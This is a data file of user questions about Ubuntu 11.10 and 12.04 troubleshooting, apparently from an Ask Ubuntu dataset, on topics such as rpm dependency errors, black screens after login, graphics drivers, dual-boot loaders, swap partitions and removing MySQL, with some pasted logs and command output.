145310	can not install rpm package on ubuntu 11.10 -- needs libc.so.6	i am trying to install an odbc driver for vpostgres ( vmware 's version for postgres ) on ubuntu 11.10 ( 64-bit ) . i have downloaded the rpm file of the installer ( 64-bit ) and when i try to install the rpm using : rpm -ivh vmware-vpostgres-client.rpm , it shows me this error : error : failed dependencies : libc.so.6 ( ) ( 64bit ) is needed by vmware-vpostgres-client-1.0.1.1145-532311.x86_64 libc.so.6 ( glibc_2.2.5 ) ( 64bit ) is needed by vmware-vpostgres-client-1.0.1.1145-532311.x86_64 libc.so.6 ( glibc_2.3 ) ( 64bit ) is needed by vmware-vpostgres-client-1.0.1.1145-532311.x86_64 libc.so.6 ( glibc_2.3.3 ) ( 64bit ) is needed by vmware-vpostgres-client-1.0.1.1145-532311.x86_64 libdl.so.2 ( ) ( 64bit ) is needed by vmware-vpostgres-client-1.0.1.1145-532311.x86_64 libdl.so.2 ( glibc_2.2.5 ) ( 64bit ) is needed by vmware-vpostgres-client-1.0.1.1145-532311.x86_64 libpthread.so.0 ( ) ( 64bit ) is needed by vmware-vpostgres-client-1.0.1.1145-532311.x86_64 libpthread.so.0 ( glibc_2.2.5 ) ( 64bit ) is needed by vmware-vpostgres-client-1.0.1.1145-532311.x86_64 libresolv.so.2 ( ) ( 64bit ) is needed by vmware-vpostgres-client-1.0.1.1145-532311.x86_64 libresolv.so.2 ( glibc_2.2.5 ) ( 64bit ) is needed by vmware-vpostgres-client-1.0.1.1145-532311.x86_64 few things i have tried : locate libpthread.so.0 returns : /lib/i386-linux-gnu/libpthread.so.0 /lib/x86_64-linux-gnu/libpthread.so.0 /lib32/libpthread.so.0 i get similar locations for all other files : locate libc.so.6 /lib/i386-linux-gnu/libc.so.6 /lib/x86_64-linux-gnu/libc.so.6 /lib32/libc.so.6 and so on . i tried creating symlinks using : sudo ln -s lib/x86_64-linux-gnu/libc.so.6 /lib64/libc.so.6 sudo ln -s lib/x86_64-linux-gnu/libc.so.6 /lib/libc.so.6 sudo ln -s lib/x86_64-linux-gnu/libc.so.6 libc.so.6 but none of them worked . i am not sure where exactly it is trying to search for this files . ldd vmware-vpostgres-client.rpm doesnt help much and returns 'not a dynamic executable ' which is expected i tried adding the path in the /etc/ld.so.conf file include lib/x86_64-linux-gnu/libc.so.6 i also tried setting the ld_library_path to the specified file but of no use . ldd -- version shows glibc 2.13 can anyone help me out where exactly does it searches for the file ?
145312	after installing ubuntu 12.04 on hp pavilion laptop , the desktop does not display correctly .	the operating system seemed to install just fine . i installed it over windows vista because i absolutely can not stand vista . i installed the 32bit as recommended by the website . my computer seems to boot just fine and i can even punch in my password at the login screen . once i hit enter the background image stays but there are no buttons , icons , anything and then the screen goes black ... then back to just the background image ... then black . my icons never seem to load . i even tried right clicking on the desktop to access the system preferences and installed a ton of updates . but it is still doing the same thing . i do n't know if i should have installed the 64bit version or if i should just throw my laptop out a window . any suggestions would be appreciated , i 've been at this all day and i 'm ready to give up . thanks !
145314	how to save brightness settings ?	after i upgraded my notebook to ubuntu 12.04 , i found that i can not save my power settings . every time i set the screen brightness to 70 % , it restored to 100 % next time . i ca n't find a save button on the new power setting panel ( i am sorry for i can not post a screenshot right now ) . can anyone tell me how to save this setting ? thanks .
145319	what are the `` online accounts '' used for under system settings ?	i previously never bothered with it . but i just did a fresh install of 12.04 and figured `` hey maybe i 'll put in my google account and see what happens '' i logged in with google and everyting like mal/calendar/contacts/chat is set to `` on '' ... i figured it might automatically set up my gmail for various applications like empathy and thunderbird.. but i opened them up and found nothing ... what exactly is the purpose of adding your account to `` online accounts '' ? where is it used ?
145327	unity 3d only show wallpaper and icon if set , where did it go ?	unity is gone . as i have use user defined session on 12.04 , i 'm back to default sesion ( ubuntu ) and then unity is gone , how to reveal it . how to get to compiz without that unity taskbar ? even ubuntu 3d on top missing . on ubuntu 2d it appears fine . help me to reveal it .
145330	how to get a vpn for ubuntu ?	i saw a thing called vpn connections under the internet button at the top of my screen . so i would like more info on this , and possibly instructions on how to set one up . thanks !
145333	command line mode only -- successful login only brings me back to login screen	whenever i log in the screen goes black , i see a glimpse of terminal-esque text , and then it brings me back to the log in screen ( ubuntu 12.04 ) . i can enter and log in via the command line . the guest account works find . i think this happened because i edited some xorg related file trying to make an external monitor work with my laptop . i copy pasted from a forum post so i dont recall the file or what i put in the file . ca n't find the forum post again and my bash history was n't recorded from that session . i tried reinstalling xorg and ubuntu-desktop , nvidia , resetting any configs i could find ... i 'm really at a loss of what to do . here 's my /.xsession-errors : /usr/sbin/lightdm-session : 11 : /home/seth/.profile : -s : not found backend : gconf integration : true profile : unity adding plugins initializing core options ... done initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing vpswitch options ... done initializing snap options ... done initializing mousepoll options ... done initializing resize options ... done initializing place options ... done initializing move options ... done initializing wall options ... done initializing grid options ... done i/o warning : failed to load external entity `` /home/seth/.compiz/session/108fa6ea48f8a973b9133850948930576700000017740033 '' initializing session options ... done initializing gnomecompat options ... done ** message : applet now removed from the notification area initializing animation options ... done initializing fade options ... done initializing unitymtgrabhandles options ... done initializing workarounds options ... done initializing scale options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing ezoom options ... done ** message : using fallback from indicator to gtkstatusicon ( compiz:1846 ) : gconf-critical ** : gconf_client_add_dir : assertion `gconf_valid_key ( dirname , null ) ' failed initializing unityshell options ... done nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory please ask your system administrator to enable user sharing . setting update `` main_menu_key '' setting update `` run_key '' setting update `` launcher_hide_mode '' setting update `` edge_responsiveness '' setting update `` launcher_capture_mouse '' ** message : moving back from gtkstatusicon to indicator compiz ( decor ) - warn : failed to bind pixmap to texture ** ( zeitgeist-datahub:2128 ) : warning ** : zeitgeist-datahub.vala:227 : unable to get name `` org.gnome.zeitgeist.datahub '' on the bus ! failed to create drawable compiz ( core ) - warn : glxcreatepixmap failed compiz ( core ) - warn : could n't bind background pixmap 0x1e00001 to texture compiz ( decor ) - warn : failed to bind pixmap to texture ** message : no keyring secrets found for sonic.net_356/802-11-wireless-security ; asking user . compiz ( decor ) - warn : failed to bind pixmap to texture compiz ( decor ) - warn : failed to bind pixmap to texture ** message : no keyring secrets found for sonic.net_356/802-11-wireless-security ; asking user . ** message : no keyring secrets found for sonic.net_356/802-11-wireless-security ; asking user . ** message : no keyring secrets found for sonic.net_356/802-11-wireless-security ; asking user . ** message : no keyring secrets found for sonic.net_356/802-11-wireless-security ; asking user . ** message : no keyring secrets found for sonic.net_356/802-11-wireless-security ; asking user . ** message : no keyring secrets found for sonic.net_356/802-11-wireless-security ; asking user . ** message : no keyring secrets found for sonic.net_356/802-11-wireless-security ; asking user . ** message : no keyring secrets found for sonic.net_356/802-11-wireless-security ; asking user . ** message : no keyring secrets found for sonic.net_356/802-11-wireless-security ; asking user . ** message : no keyring secrets found for sonic.net_356/802-11-wireless-security ; asking user . ** message : no keyring secrets found for sonic.net_356/802-11-wireless-security ; asking user . ** message : no keyring secrets found for sonic.net_356/802-11-wireless-security ; asking user . [ 2348:2352:12678840568 : error : gpu_watchdog_thread.cc ( 231 ) ] the gpu process hung . terminating after 10000 ms. [ 2256:2283:14450711755 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:14450726175 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:14450746028 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:14464521342 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:14464541249 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:14690775186 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:14690795231 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:14704543843 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:14704566717 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:14766138587 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:14857232694 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:14930901403 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:14930965542 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:14944566814 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:14944592215 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:15170929788 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:15170947382 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:15184585015 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:15184605475 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:15366189036 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:15410983381 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:15411569689 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:15431632431 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:15431674438 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:15457304356 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:15656020938 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:15656042383 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:15674651268 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:15674671786 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:16052544301 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:16057387653 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:16157122849 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:16157123851 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:16157125473 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:16157126544 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 [ 2256:2283:16157129682 : error : ssl_client_socket_nss.cc ( 1542 ) ] handshake with server mail.google.com:443 failed ; nss error code -5938 , net_error -107 if anyone can help me out , i 'd be forever grateful
145335	dual boot 12.04/windows 7 after installation my computer reboots straight to windows . there is no option to boot ubuntu .	windows 7 home premium intel i5 2500k cpu asusp8z68-v pro motherboard geforce gtx 570 gpu corsair 120gb ssd ( windows 7 os ) wd 1 tb hdd i select the usb drive in the bios and boot to it and choose install . i select to manually configure partitions , partition the 200 gb of unallocated space on my 1 tb hdd into 16 gb swap file , 30 gb / ext4 , and 154 gb /home ext4 . i make sure that the boot loader is installed to corsair 120gb ssd ( where the windows boot is ) and the installation goes smoothly . when i reboot after the install it runs through the bios straight into windows . i have tried upwards of a dozen times and i have also tried with linux mint . i have also redownloaded the iso and used two different programs to create the live usb . the installation seems to go well as , after the install , i can see the partitions i have created in the windows device manager . i currently run lubuntu on my laptop but it is not a dual boot . i 'm assuming this is a boot loader issue and i am assuming that inside those partitioned files in my screenshot there is a working os of ubuntu 12.04 . i just have no way of getting to it . update ( copied from comment ) i booted using my live usb and used the boot-repair tool suggested in virpara 's answer . upon opening the tool i saw that it was recognizing my ssd as a removeable drive and defaulting to install on the hdd . once i realized that i was able to force install onto the sdd . my computer can now boot ubuntu .
145342	disabling monitor reconfiguration when closing lid	i often need to move my laptop from one working place to another . when i do this , there are two events ubuntu responds to by changing the monitor set up : removing/attaching the vga cable closing/opening the lid of the laptop while removing the vga cable gives me what i need ( single screen , highest native resolution on the external screen if connected ; otherwise highest resolution on the laptop ) , the laptop close/open lid response is not as good . every time i close or open the lid , ubuntu reconfigures the monitor set up . when i close the lid now ... the screen goes black for a few seconds and it switches to clone , with my laptop screen disabled . reopening results in ... briefly a black screen , then the external monitor being used as desktop extension . update : things changed a bit recently , the behaviour is more predictable now . closing the lid switches to single display , opening to dual screen ( not clone ) . my question is still accurate : see below . ubuntu thinks too much . my first and foremost question : is there any way to let ubuntu ignore lid close events ? ideally ( or when there 's no way to solve above question ) i 'd want to change how it deals with the screen reconfiguration . why does ubuntu toggle the screen configuration between external , clone and single display ? ca n't i just configure it to always use the external monitor , when present , in single screen mode ? note that similar questions have been asked before ( most notably this one ) , but these have been closed perhaps wrongly . any ideas are very welcome , i do n't mind playing around a bit to see if something works .
145343	good wecam recording software	i 've tried the cheese one already , but it lags . what are some other wecam recording software that does n't lag ? thanks .
145345	ubuntu 12.04 installation aborts without giving any errors on sony vaio	i 'm not able to install the release ubuntu-12.04-desktop-i386 on the laptop below : sony vaio vgn-fe21h cpu : intel core duo t2300 1.66ghz memory : 2gb ddr2 533mhz hdd : 100gb graphics : nvidia geforce 7400 256mb i 'm using the iso `` ubuntu-12.04-desktop-i386.iso '' burned into a dvd . i know the iso is ok because i used it to successfully install on virtualbox . live dvd boots and runs ok , but i can not install from it or directly from the boot menu . the installation goes through all the steps until the final part where is asked the name , name of pc and password . the problem is in the next step where it should start copying files and present some screens and features of ubuntu . in this part the installation just close without any error message . if i am running the installation inside the live dvd it closes and returns to the home screen of the live . if i am running straight from the boot it closes the graphic interface and restarts the pc . does anybody know or faced the same problem ?
145347	what does 1024x768x24 mean ?	i was planning to change the plymouth screen resolution ( blame fglrx ! ) . when i went to grub-customizer ( info for that ) , the screen resolution menu shows ( as usual ) 800x600 , 1024x678 , 600x400 , and a bunch of other things . but after i scrolled down , i saw weird screen resolutions like 1024x768 x8 , 1280x1024 x16 , 800x600 x24 , etc . computer screens shape like a rectangle , not a cube , so what does those extra numbers mean ? or is there a secret dimension in every computer screen that i ignored ?
145356	how can i enable wobbly windows without using ccsm	i am using ubuntu12.04 and unity . conpiz config settings manager makes my unity desktop carsh easily , so i wonder how to enable wobbly windows effect without using ccsm ? as i know , in the ubuntu 11.04 , ubuntu tweak 0.5 provide some compiz settings , how do you enable wobbly windows in ubuntu 11.04 without using compiz ? but in the 12.04 and latest ubuntu tweak 0.7 does n't have desktop tweak tool .
145358	compiz taking 40-30 % of cpu resources , is it ok ?	on normal working with nothing opened , compiz fires up to 50 % cpu usage on my machine . which is abnormal i think . is this a bug or is this behavior ok ? i am running ubuntu 12.04 on intel i5 processor ati 5400 mobility 512 mb graphic card
145359	how can i make unity 2d the default session at start-up ?	i want ubuntu to always use unity2d by default . i am using the latest version ( 12.04 lts ) .
145362	lost gtk theme style in login screen after compiz crashed	normally , all controls in login screen ( button , textbox , etc.. ) have the current gtk-theme style . but after compiz crashed ( always happen when i enable or disable a plugin ) , the style has gone ( no more transparent button , rounder textbox , or my current icon theme ) , instead there are ugly windows-95-like buttons , textbox and unknown-theme icon . is this a compiz bug ? how could i fix it ? thanks for your time ! ps : im on ubuntu 12.04 ( unity ) . this is my ubuntu login screen : this is default ubuntu login screen : im on dell vostro 1540 with intel hd 3000 vga . at first , my login screen looks nothing wrong . but after compiz crashed ( when i enable or disable any plugin ) , the login screen looks like the above pictures . so , i dont think my graphics card is the problem .
145363	ubuntu 12.04 black screen while using logitech headset wireless dongle	as soon as i attach my logitech headset wireless dongle to my computer a black screen appears and does n't go away . please help .
145366	12.04 does not work with intel gm 45	someone answer this please : how do i install working drivers for an intel 4500mhd ? a ton of us all over the internet have this problem and nobody is giving any answers at all . is it just a known bug ? does 12.04 just not work with this extremely common graphics chip ? what is the answer ?
145371	successfully installed ubuntu 12.04 getting black screen when starting ...	i just installed ubuntu 12.04 . after it says that it was successfully installed i went on try to launch ubuntu and i am stuck in a reddish black screen with a black box on the upper left corner . i reinstalled three times , same thing happens . checked the hardware requirements and i seem to have them but it looks like i got a graphics card issue . single core amd built in vga ( nvidia ) 320hdd 1gb ram
145372	getting ati driver to work ?	i have linux 12.04 lts installed on my hpdv7t laptop ( dual booted with windows 7 ) . my laptop specs are : -intel core i7 2620m 2.7 ghz dual core processor -radeon 6770m graphics card -it is switchable graphics -12 gb ram i 've been trying to get catalyst control center to run , but it has this error : initialization error : there was a problem initializing catalyst control center linux edition . it could be caused by the following . no ati graphics driver is installed , or the ati driver is not functioning properly . please install the ati driver appropriate for you ati hardware , or configure using aticonfig . can anyone help ? this is the very first time i 've used linux , so detailed instructions would be nice . ( i do know how to get to the terminal though . and change directory in terminal ) thanks .
145376	disable dash docking feature in gnome shell	i want to use gnome dock only as a launching panel , i do n't want it to show currently opened windows . that is it should be just bookmark bar for favorite applications . how do i do this ?
145380	how can i change the en_au locale to 12 hour format ?	i 've noticed that the en_au locale is defaulting to 24 hour time , it should be 12 hour as this is most commonly used in australia . how can this be adjusted ?
145381	thunderbird wo n't open after a fresh install of 12.04 , how to fix ?	when i try to open thunderbird , it opens for 1 second and then force close . i executed via terminal and i saw this : /usr/lib/thunderbird/thunderbird-bin : symbol lookup error : /usr/local/lib/libgobject-2.0.so : undefined symbol : g_bsearch_array_lookup what 's happening ? ? ? system : eee netbook os : ubuntu 12.04 32-bit os
145382	gnome shell got removed after updating ubuntu 12.04	now when i try to install it ... it shows the following error sudo apt-get install gnome-shell reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gnome-shell : depends : libgcr-3-1 ( > = 3.4.0 ) but 3.2.2-2ubuntu4 is to be installed depends : gir1.2-gcr-3 but it is not installable recommends : gnome-contacts but it is not going to be installed e : unable to correct problems , you have held broken packages . how can i install gnome-shell ?
145383	search document by keyword using unity lenses	say , i have many documents in my computer and i just want to find one document which contains some specific word ( s ) in it . i ca n't even remember the type or name of the document . i tried to achieve this with unity ( documents & folders ) lenses , but it seems ubuntu only looking for the names ( of files and folders ) but not looking inside of the documents . please advise whether i can achieve my goal using ubuntu or not .
145393	change desktop file manager	i have marlin set to my default file explorer , but when i open my desktop icons it still uses nautilus . is there a way to make marlin manage the desktop instead of nautilus ?
145394	canon lpb2900b not working in ubuntu 12.04	hey if anyone can please help ! ! ! i have a canon lbp2900b in ubuntu 12.04 lts 32bit the printer automatically configures when switched on but when print command is given , it shows > > > > > ccp send_data error , exit please help ! ! ! i dont want to change to windows again just to get this printer working i love ubuntu ! ! ! !
145399	swap partition does not mount on restart	i am using ubuntu 12.04 and was trying to enable hibernate.i came across that one should have swap partition equivalent to ram in system so created one . my file system information on sudo fdisk -l /dev/sda disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000b11e9 device boot start end blocks id system /dev/sda1 63 96389 48163+ de dell utility /dev/sda2 98304 84097023 41999360 83 linux /dev/sda3 84097024 167878655 41890816 7 hpfs/ntfs/exfat /dev/sda4 167879311 312575999 72348344+ f w95 ext 'd ( lba ) /dev/sda5 167879313 287396152 59758420 7 hpfs/ntfs/exfat /dev/sda6 287397888 310425599 11513856 7 hpfs/ntfs/exfat /dev/sda7 310427648 312575999 1074176 82 linux swap / solaris i am able to hibernate my system once i swapon my /dev/sda7 partition . for that i do , mkswap /dev/sda7 and swapon /dev/sda7 i even added entry in /etc/fstab uuid= '' xxx '' /dev/sda7 none swap sw 0 0 everything happens successfully including sudo pm-hibernate but when i restart my system after hibernate its not able to load my swap partition . i checked using gparted partition editor then for /dev/sda7 the file system becomes unknown . please help in resolving this .
145400	various crashes in 12.04 after upgrade and fresh install	ubuntu drives me crazy . since i upgraded from 11.10 64-bit to 12.04 ubuntu crashes regularly . one time the crash report tells me that skype is the faulty app , another time it was opera , and today the crash report tells me xorg crashes . i read that it can be caused by a faulty upgrade so i made a clean new installation of 12.04 32-bit . but the error is the same . i had a look in the log files with a friend but we did not find a answer . this morning the crashes happened like this : boot auto-start thunderbird start vlc for radio start opera working a while ( 30 minutes ) starting skype 2 minutes later , the system freezes , the monitor turns black , a login screen appears and i enter my password . the desktop comes up again and the crash report pops up .
145405	boot delay and mouse lag at login after ubuntu 12.04 update	i am facing these weird problems after updating ubuntu 12.04 with apt-get update & & apt-get upgrade : it takes too much time to come to the plymouth theme after selecting ubuntu from the grub menu . is it possible to correct this ? on the login screen , before entering the password , whenever i move the mouse , it is kind of lagging/stuck . only after entering the password and pressing enter , it works normally . i think this may be because of the updated kernel . if so , is it possible to downgrade the kernel to the previous one ? if that is not the reason , what can be the problem ?
145407	how do i install drivers for graphics and sound ?	i recently shifted to ubuntu 12.04 from windows 7 . i completely removed windows and then installed ubuntu . however , i ca n't find a way to download and install drivers for my video and audio hardware like i used to be able to do in windows . could someone please explain to me how software and drivers , in general , are installed on ubuntu . is installing through 'ubuntu software center ' the only way to install them ? my laptop model is : dell inspiron 14 n4010 ( i5/4gb/500gb ) . kindly help . thanks in advance .
145408	when i delete a picture from my android phone , it doesnt delete from the cloud	ive deleted several pics on my phone over the last week , and when i just checked the cloud , i noticed those files are still on there . i searched through the settings both on my phone app and in the browser . i cant seem to find a setting that will sync my deletes . i searched through the faq and it seems like this is done automatically ? in fact , someone was having issues because their hard drive filled up with music , so they wanted to delete their local music dir but it deleted in the cloud . am i missing something ? its not an issue yet because i have plenty of storage left , but it will be a pain to go into the cloud and view each pic and then delete it . of course , its free so im not complaining : ) i do appreciate this service ! now if i drop my phone in the toilet i wont lose my photos : ) please let me know if anyone knows what i may be missing or maybe im misunderstanding how this works . thanks ! -dan
145410	burg problem after update	after an update of my kernel , the burg does n't starts anymore , instead the grub came up when i 've restarted my system . i tried update-burg , but does n't helped . any ideas ?
145418	what are `` failed to fetch cdrom '' errors in update manager and how do i fix them ?	whenever i run update-manager , i am getting the following error : failed to fetch cdrom : //ubuntu 10.04.2 lts _lucid lynx_ - release amd64 ( 20110211.1 ) /dists/lucid/main/binary-amd64/packages.gz please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms failed to fetch cdrom : //ubuntu 10.04.2 lts _lucid lynx_ - release amd64 ( 20110211.1 ) /dists/lucid/restricted/binary-amd64/packages.gz please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms failed to fetch http : //ppa.launchpad.net/qwibber-daily/ppa/ubuntu/dists/lucid/main/binary-amd64/packages.gz 404 not found how can i get rid of these errors ? what is this error trying to tell me ?
145428	usb mouse / flash drive do n't work in xubuntu	i just started now with xubuntu ( 11.10 ) and i do n't know why but my mouse works strange . if i try to move my mouse it move in jumps and is not fluid ( but if i use my trackpad there are n't any problems ) . another really strange thing is if i take off the usb mouse and plug it back in , it does n't work anymore . also if i put in a usb flash drive nothing happens . maybe it 's some usb problem or something , but i do n't know . pc : fujitsu siemens amilo .
145429	not able to connect to local network	i have installed kubuntu , i am able to connect to internet and able to access external sites , but in my local network i have bugzila installed that i am not able to access , even i am not able to ping the gateway also 192.168.1.1 . below is the result of ifconfig command please help . thanks ~ # ifconfig eth0 link encap : ethernet hwaddr b8:70 : f4 : da : f9 : a8 inet addr:192.168.1.100 bcast:192.168.1.255 mask:255.255.255.0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:42 base address:0x2000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:884 errors:0 dropped:0 overruns:0 frame:0 tx packets:884 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:81131 ( 81.1 kb ) tx bytes:81131 ( 81.1 kb ) wlan0 link encap : ethernet hwaddr 68:5d:43:2e:1c:79 inet addr:192.168.1.26 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :6a5d:43ff : fe2e:1c79/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2446 errors:0 dropped:0 overruns:0 frame:0 tx packets:2324 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1909441 ( 1.9 mb ) tx bytes:393292 ( 393.2 kb )
145430	how to enable manually unity keyboard layout switching	in 12.04 i can not use in unity its default keyboard layout switching mechanism . it does n't matter how many and which layouts are added , only keyboard defined in xorgs ( or possibly configurable manually using sudo setxkbmap -option grp : alt_shift_toggle `` us , cz '' ) appears in system . so what to check why it does n't work or how to bind setxkbmap directly ?
145431	how to remove mysql completely with config and library files ?	i tried everything till now : sudo apt-get remove mysql-server mysql-client mysql-common sudo apt-get purge mysql-server mysql-client mysql-common sudo apt-get autoremove and even more commands ... but whenever i am trying to locate mysql . i get a no . of files related to mysql command : shell > > locate mysql output : /etc/mysql /etc/apparmor.d/usr.sbin.mysqld /etc/apparmor.d/abstractions/mysql /etc/apparmor.d/cache/usr.sbin.mysqld /etc/apparmor.d/cache/usr.sbin.mysqld-akonadi /etc/apparmor.d/local/usr.sbin.mysqld /etc/bash_completion.d/mysqladmin /etc/init/mysql.conf /etc/logcheck/ignore.d.paranoid/mysql-server-5_5 /etc/logcheck/ignore.d.server/mysql-server-5_5 /etc/logcheck/ignore.d.workstation/mysql-server-5_5 /etc/logrotate.d/mysql-server /etc/mysql/conf.d /etc/mysql/debian-start /etc/mysql/debian.cnf /etc/mysql/conf.d/mysqld_safe_syslog.cnf /home/pkr/.mysql_history /home/pkr/.cache/software-center/piston-helper/rec.ubuntu.com , api,1.0 , recommend_app , libqt4-sql-mysql , ,349051c3a57da571aa832adb39177aff /home/pkr/.cache/software-center/piston-helper/rec.ubuntu.com , api,1.0 , recommend_app , mysql-client , ,cbf77a486cdc80547317981a33144427 /home/pkr/.cache/software-center/piston-helper/rec.ubuntu.com , api,1.0 , recommend_app , mysql-client , ,de8220dee4d957a9502caa79e8d2fdda /home/pkr/.cache/software-center/rnrclient/reviews.ubuntu.com , reviews , api,1.0 , reviews , filter , en , any , any , any , libqt4-sql-mysql , page,1 , helpful , ,17fb2e657321dc51526ee8fe9928da30 /home/pkr/.cache/software-center/rnrclient/reviews.ubuntu.com , reviews , api,1.0 , reviews , filter , en , any , any , any , mysql-client , page,1 , helpful , ,a4c1b6e8200f36ab5745c6f81f14da0a /home/pkr/.cache/software-center/rnrclient/reviews.ubuntu.com , reviews , api,1.0 , reviews , filter , en , ubuntu , oneiric , any , libqt4-sql-mysql , page,1 , helpful , ,c54295fb82b8183350cd34f22c3547ef /home/pkr/.cache/software-center/rnrclient/reviews.ubuntu.com , reviews , api,1.0 , reviews , filter , en , ubuntu , oneiric , any , mysql-client , page,1 , helpful , ,fcf201c1abff3f774af89173a84de2cc /home/pkr/.cache/software-center/rnrclient/reviews.ubuntu.com , reviews , api,1.0 , reviews , filter , en , ubuntu , precise , any , libqt4-sql-mysql , page,1 , helpful , ,0cd86648584efeccfb16119012f89540 /home/pkr/.cache/software-center/rnrclient/reviews.ubuntu.com , reviews , api,1.0 , reviews , filter , en , ubuntu , precise , any , mysql-client , page,1 , helpful , ,eb84724e9da7851ff8862a227d8bac59 /home/pkr/.local/share/akonadi/mysql.conf /home/pkr/.local/share/akonadi/db_data/mysql /home/pkr/.local/share/akonadi/db_data/mysql.err /home/pkr/.local/share/akonadi/db_data/mysql.err.old /home/pkr/.local/share/akonadi/db_data/mysql/columns_priv.myd 